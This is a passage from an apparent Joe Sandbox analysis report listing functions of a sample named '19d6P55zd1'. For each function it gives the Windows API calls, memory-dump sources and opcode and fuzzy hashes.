                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 650687236-0
                                                                                                                    • Opcode ID: 682d2dcba5ba4c157d3b81690fa61a274702900ae21ad0b8babb43a00873eca6
                                                                                                                    • Instruction ID: bb03e8c9e34e5c60bcac030f2e201e544d85636ff0d01d299b3d8a046e95b582
                                                                                                                    • Opcode Fuzzy Hash: 682d2dcba5ba4c157d3b81690fa61a274702900ae21ad0b8babb43a00873eca6
                                                                                                                    • Instruction Fuzzy Hash: 17517F35E00615EFCF16EFA4C845AAEB7B8EF4A720F154069E855BB351CB34AE41CB90
                                                                                                                    Function 0037EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0037EF06
                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 0037EF78
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0037EFD3
                                                                                                                    • _memmove.LIBCMT ref: 0037EFFD
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0037F04A
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0037F078
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1101466143-0
                                                                                                                    • Opcode ID: 8537a8d56772ed066dcd39bf087a63fa382753c932594a5f5a89848d40ff9075
                                                                                                                    • Instruction ID: cc9cfaf1db564ce906a126a8fd07d6eaf2f3c009379b2289b1e45fe481f25214
                                                                                                                    • Opcode Fuzzy Hash: 8537a8d56772ed066dcd39bf087a63fa382753c932594a5f5a89848d40ff9075
                                                                                                                    • Instruction Fuzzy Hash: E85169B5A00209EFCB25CF58C884AAAB7F8FF4D314F158569E959DB301E734E911CBA0
                                                                                                                    Function 0038220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382258
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003822A3
                                                                                                                    • IsMenu.USER32(00000000), ref: 003822C3
                                                                                                                    • CreatePopupMenu.USER32 ref: 003822F7
                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00382355
                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00382386
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3311875123-0
                                                                                                                    • Opcode ID: 53cdfe4f44214372166fde6826af06d998cfece84d720010f4ecf397481b26b2
                                                                                                                    • Instruction ID: b767aa9d52747040ee5ae692acdb71a2325dbc3ac3a625c6e067f4e45dd313e7
                                                                                                                    • Opcode Fuzzy Hash: 53cdfe4f44214372166fde6826af06d998cfece84d720010f4ecf397481b26b2
                                                                                                                    • Instruction Fuzzy Hash: 8651D034600309DFCF22EF64D898BAFBBF8AF46314F1541A9E8519B290D3B48904CB11
                                                                                                                    Function 00321765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0032179A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003217FE
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0032181B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0032182C
                                                                                                                    • EndPaint.USER32(?,?), ref: 00321876
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1827037458-0
                                                                                                                    • Opcode ID: 7bd7d5828a85a2edbb8ba68dd7445f25c8612ad15af40e49056bf6a9f60052db
                                                                                                                    • Instruction ID: b6f8134dce362764ca970e74e42d289f02c9eeeb7da1b2c3efb7540f38908863
                                                                                                                    • Opcode Fuzzy Hash: 7bd7d5828a85a2edbb8ba68dd7445f25c8612ad15af40e49056bf6a9f60052db
                                                                                                                    • Instruction Fuzzy Hash: D741AC30600754AFD722DF24DCC4FAA7BECEB5A724F140628F9A48A2B1C7709845DB62
                                                                                                                    Function 003AB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(003E57B0,00000000,011B58C8,?,?,003E57B0,?,003AB5A8,?,?), ref: 003AB712
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 003AB736
                                                                                                                    • ShowWindow.USER32(003E57B0,00000000,011B58C8,?,?,003E57B0,?,003AB5A8,?,?), ref: 003AB796
                                                                                                                    • ShowWindow.USER32(00000000,00000004,?,003AB5A8,?,?), ref: 003AB7A8
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 003AB7CC
                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003AB7EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: 6ac61c01d9c9527a9b4f032ae02e255a42d4d7c399826a011a735e5b39a15901
                                                                                                                    • Instruction ID: 210e9aff044af3a4549025105ef950091de47087e52ceebc307e790ee7add5e4
                                                                                                                    • Opcode Fuzzy Hash: 6ac61c01d9c9527a9b4f032ae02e255a42d4d7c399826a011a735e5b39a15901
                                                                                                                    • Instruction Fuzzy Hash: 00416F34600240AFDB27CF24C499B94BBE1FF46350F1941B9E9488F6A3C7B2AC56DB61
                                                                                                                    Function 0039709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00394E41,?,?,00000000,00000001), ref: 003970AC
                                                                                                                      • Part of subcall function 003939A0: GetWindowRect.USER32(?,?), ref: 003939B3
                                                                                                                    • GetDesktopWindow.USER32 ref: 003970D6
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003970DD
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0039710F
                                                                                                                      • Part of subcall function 00385244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    • GetCursorPos.USER32(?), ref: 0039713B
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00397199
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4137160315-0
                                                                                                                    • Opcode ID: bedca261c24cc08984a3783b8b3ed999b5a8c72e4c6447b04bffa37b6ffd1b03
                                                                                                                    • Instruction ID: dcf0aa8c30fc864628e5bc2bc346dd06d2033b08994d79d53456d7cda4c8f06c
                                                                                                                    • Opcode Fuzzy Hash: bedca261c24cc08984a3783b8b3ed999b5a8c72e4c6447b04bffa37b6ffd1b03
                                                                                                                    • Instruction Fuzzy Hash: EF31D072509305AFDB21EF54C849B9BB7EAFF89314F000929F58997191CB30EA09CB92
                                                                                                                    Function 00378879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003780C0
                                                                                                                      • Part of subcall function 003780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003780CA
                                                                                                                      • Part of subcall function 003780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003780D9
                                                                                                                      • Part of subcall function 003780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003780E0
                                                                                                                      • Part of subcall function 003780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003780F6
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0037842F), ref: 003788CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003788D6
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 003788DD
                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 003788F6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,0037842F), ref: 0037890A
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00378911
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3008561057-0
                                                                                                                    • Opcode ID: d28dd7f96fa8cfeb9e3ecce4bf416fbcd08e60173c22a96ddce52b0540da4e56
                                                                                                                    • Instruction ID: 49095ae7d3a568a19f11a441aa0e772cc6eb1be1c5e1086c4bf29de29a9551e4
                                                                                                                    • Opcode Fuzzy Hash: d28dd7f96fa8cfeb9e3ecce4bf416fbcd08e60173c22a96ddce52b0540da4e56
                                                                                                                    • Instruction Fuzzy Hash: FF11B171641209FFDB229FA4DC09BBE7BACEB46311F118028E989D7110CB3A9D04DB61
                                                                                                                    Function 003785B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003785E2
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 003785E9
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003785F8
                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00378603
                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00378632
                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00378646
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: b85223463cbfb3b57766cca992dd3281c4bd81b8b3ea6ee6806cf4a41eb8ada6
                                                                                                                    • Instruction ID: 1373f2b8e28ed0992b70bbe455be67b5f6ce75a0d0176c1be800cb497b2461fd
                                                                                                                    • Opcode Fuzzy Hash: b85223463cbfb3b57766cca992dd3281c4bd81b8b3ea6ee6806cf4a41eb8ada6
                                                                                                                    • Instruction Fuzzy Hash: 2E115C72540209AFDF12CFA4DD49BEE7BADEF09354F058064FE04A2160C7768D60DB60
                                                                                                                    Function 0037B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0037B7B5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037B7C6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037B7CD
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0037B7D5
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037B7EC
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0037B7FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: ac1cdd7b4646380fd9707ad8488f097e50bc744d700d9e2034b8f4dd90454de1
                                                                                                                    • Instruction ID: 4d2ae90df448df9624e4bb7a1438bf5da98ec34f702dcdfb2a2ff03101e05862
                                                                                                                    • Opcode Fuzzy Hash: ac1cdd7b4646380fd9707ad8488f097e50bc744d700d9e2034b8f4dd90454de1
                                                                                                                    • Instruction Fuzzy Hash: 21017175E00209BFEB219BE69C45A5ABFB8EF49311F008065FA08A7291D6759C00CF90
                                                                                                                    Function 00340162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00340193
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0034019B
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003401A6
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003401B1
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 003401B9
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003401C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: f6981f1da07977a14441634bb327ab986735c5d39e3847d3d429374e46073269
                                                                                                                    • Instruction ID: 0d865d7287244cc266f4820fd0ffc648aeaa3a067b7328f5d3d2b9e314a471f1
                                                                                                                    • Opcode Fuzzy Hash: f6981f1da07977a14441634bb327ab986735c5d39e3847d3d429374e46073269
                                                                                                                    • Instruction Fuzzy Hash: C8016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                    Function 003853E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003853F9
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0038540F
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0038541E
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0038542D
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00385437
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0038543E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: 914e164386649a0eace253c444eb1396bf3999f08e33203656cfcdfab3b9cf89
                                                                                                                    • Instruction ID: fad1137ca1a165a89a3359703075e1d6fa2950846a713d298d5622b7a506ccdf
                                                                                                                    • Opcode Fuzzy Hash: 914e164386649a0eace253c444eb1396bf3999f08e33203656cfcdfab3b9cf89
                                                                                                                    • Instruction Fuzzy Hash: 00F01D36241558BFE7225BE2DC0EEAB7B7CEBC7B11F000169FA04D10A196A51A0186B5
                                                                                                                    Function 00387230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00387243
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00330EE4,?,?), ref: 00387254
                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00330EE4,?,?), ref: 00387261
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00330EE4,?,?), ref: 0038726E
                                                                                                                      • Part of subcall function 00386C35: CloseHandle.KERNEL32(00000000,?,0038727B,?,00330EE4,?,?), ref: 00386C3F
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00387281
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00330EE4,?,?), ref: 00387288
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 2a212853be39d4149687258d5cce5ab29af9abcabbd29c6d688f9817ca4d9081
                                                                                                                    • Instruction ID: 4a8dd8c65a7619689fb5a1f511e2ae346a6db4a73bdfff8d0aa05c190fcc247e
                                                                                                                    • Opcode Fuzzy Hash: 2a212853be39d4149687258d5cce5ab29af9abcabbd29c6d688f9817ca4d9081
                                                                                                                    • Instruction Fuzzy Hash: A4F05E3A540712EFD7632BA4ED8CAEA773EEF46702F110971F503950A0DB7A5801CB50
                                                                                                                    Function 00378992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037899D
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 003789A9
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003789B2
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003789BA
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003789C3
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003789CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: 5083cad9ad6b9d4d946a8a33368fa409b12b5bbb4b7f3986bc1e8c49f58d3e24
                                                                                                                    • Instruction ID: cc831161a35e6e0ee299a24149ee31057407870dd8ed9074bfb7ee253f50e8a8
                                                                                                                    • Opcode Fuzzy Hash: 5083cad9ad6b9d4d946a8a33368fa409b12b5bbb4b7f3986bc1e8c49f58d3e24
                                                                                                                    • Instruction Fuzzy Hash: 0DE05276104505FFDB021FE5EC0C95ABB6DFB8A762B508631F219814B0CB329461DB50
                                                                                                                    Function 00377530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003B2C7C,?), ref: 003776EA
